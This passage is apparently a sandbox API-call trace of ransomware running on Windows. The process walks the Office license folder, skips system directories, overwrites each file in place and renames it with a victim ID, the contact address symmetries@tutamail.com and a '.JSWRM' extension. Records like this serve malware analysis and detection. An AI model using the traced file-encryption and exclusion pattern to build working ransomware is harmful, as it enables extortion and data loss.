dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.701] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20977) returned 1 [0111.701] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51f0) returned 0x24c1d0 [0111.701] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51f0, lpOverlapped=0x0) returned 1 [0111.704] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.704] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51f0, lpOverlapped=0x0) returned 1 [0111.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.704] CloseHandle (hObject=0x45c) returned 1 [0111.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0111.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0111.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0111.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0111.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0111.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0111.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0111.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0111.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0111.706] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec3248fc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec3248fc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec3e34b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Trial-ul-oob.xrm-ms", cAlternateFileName="VIC283~1.XRM")) returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.706] lstrcmpiW (lpString1="VisioProR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0111.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0111.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0111.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0111.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0111.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.707] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11598) returned 1 [0111.707] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0111.707] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0111.712] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.712] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0111.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.712] CloseHandle (hObject=0x45c) returned 1 [0111.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0111.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0111.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0111.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0111.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.713] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0111.714] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec1f3616, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec1f3616, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec3248fc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ad6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="VI0AAB~1.XRM")) returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.714] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0111.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0111.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0111.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0111.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0111.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.715] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6870) returned 1 [0111.715] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ad0) returned 0x205850 [0111.715] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ad0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1ad0, lpOverlapped=0x0) returned 1 [0111.719] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.719] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1ad0, lpOverlapped=0x0) returned 1 [0111.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0111.719] CloseHandle (hObject=0x45c) returned 1 [0111.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0111.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0111.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0111.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0111.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0111.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.721] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec34ab5e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec34ab5e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec4c830e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="VIA215~1.XRM")) returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.721] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0111.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0111.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.721] WideCharToMultiByte (in: CodePage=0xfde9, 